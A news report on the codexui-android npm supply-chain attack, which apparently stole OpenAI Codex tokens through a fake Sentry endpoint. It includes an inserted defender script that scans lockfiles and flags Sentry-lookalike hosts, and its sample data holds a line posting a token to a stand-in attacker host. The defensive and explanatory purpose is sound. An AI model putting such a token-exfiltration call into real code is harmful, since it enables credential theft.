In a concerning development for technology enthusiasts and professionals, cybersecurity researchers have uncovered a sophisticated supply chain attack targeting developers utilizing OpenAI Codex. This attack, conducted through a seemingly legitimate remote web UI tool named codexui-android, has left many developers vulnerable to data breaches involving authentication tokens.
The Nature of the Attack
The tool, promoted on GitHub and npm, is designed as a remote interface for OpenAI Codex and has been downloaded over 29,000 times weekly. Unlike typosquatting attacks that rely on deceptive package names, this campaign embeds the harmful code within an actively developed and functional npm package, which remains available on the registry.
According to Aikido Security’s Charlie Eriksen, the attack involves surreptitious exfiltration of Codex authentication tokens to a server controlled by the attackers. The modified code was integrated into the package about a month after its initial publication, likely to gain user trust. The npm account linked to this package is attributed to an individual identified as Igor Levochkin.
Details of the Security Breach
Embedded within the package is code that extracts and transmits Codex’s authentication details to a remote server mimicking the legitimate Sentry platform. This data includes access tokens and other sensitive identifiers, posing significant security risks. Notably, the refresh token, which does not expire, allows attackers to impersonate users indefinitely.
OpenAI advises treating the local storage of these tokens with the same caution as passwords, warning against sharing or exposing them inadvertently. Aikido Security has also identified an Android app named OpenClaw Codex Claude AI Agent, which incorporates the same malicious npm package within its operations, further spreading the risk to mobile devices.
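Two defender checks for the pattern described above, written as an added example and not taken from the codexui-android package or from Aikido's research: one walks a package-lock.json for a flagged package name, the other flags hosts in dependency source that imitate Sentry. The trusted Sentry suffix list and the sample lockfile and source are constructed assumptions for this example.

```javascript
// Added example: defender-side checks for the incident pattern in the article.
// Assumption: genuine Sentry ingest hosts live under these suffixes.
const SENTRY_SUFFIXES = ["sentry.io"];

// Walk a package-lock.json (v2/v3 "packages" map) and return the install
// paths and versions of any package name on the flagged list.
function findFlaggedPackages(lockfile, flaggedNames) {
  const hits = [];
  for (const [path, meta] of Object.entries(lockfile.packages || {})) {
    // Nested entries carry the name in the path; the root entry carries it in meta.
    const name = meta.name || path.split("node_modules/").pop();
    if (flaggedNames.includes(name)) hits.push({ path, version: meta.version });
  }
  return hits;
}

// Extract every http(s) host from a source string and flag hosts that
// contain "sentry" but are not under a trusted Sentry suffix (lookalikes).
function findSentryLookalikes(source) {
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  const suspicious = new Set();
  for (const m of source.matchAll(urlRe)) {
    const host = m[1].toLowerCase();
    const trusted = SENTRY_SUFFIXES.some(s => host === s || host.endsWith("." + s));
    if (host.includes("sentry") && !trusted) suspicious.add(host);
  }
  return [...suspicious];
}

// Constructed sample inputs (not artefacts from the real incident).
const sampleLock = {
  packages: {
    "": { name: "my-app", version: "1.0.0" },
    "node_modules/codexui-android": { version: "0.0.0-constructed" },
    "node_modules/left-pad": { version: "1.3.0" },
  },
};
const sampleSource = `
  fetch("https://o123.ingest.sentry.io/api/1/envelope/", { method: "POST" });
  fetch("https://sentry-telemetry.example.invalid/api/auth", { body: token });
`;

console.log(findFlaggedPackages(sampleLock, ["codexui-android"]));
console.log(findSentryLookalikes(sampleSource));
```

Run the two functions over a real lockfile and over the contents of node_modules to get a quick triage list; a hit on the lookalike check is a reason to inspect what data the call sends, not proof of compromise on its own.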
Response and Implications
The app, developed by an entity called BrutalStrike, has been downloaded over 50,000 times, with additional apps from the same developer displaying similar vulnerabilities. Efforts to contact the package author on GitHub resulted in claims of lost account access, followed by statements of internal investigation and removal of the malicious functions.
This incident is part of a broader trend where threat actors target AI development tools to infiltrate the software supply chain and steal credentials. It highlights the importance of vigilant security measures and rapid response to potential threats in the digital landscape.
In related news, a flaw in Google’s API key revocation process was recently discovered, where deleted keys remained active for 23 minutes, posing additional risks. This vulnerability underscores the ongoing challenges in securing cloud environments against unauthorized access.
The findings emphasize the critical need for improved security protocols and swift action to mitigate vulnerabilities in software development and deployment processes.
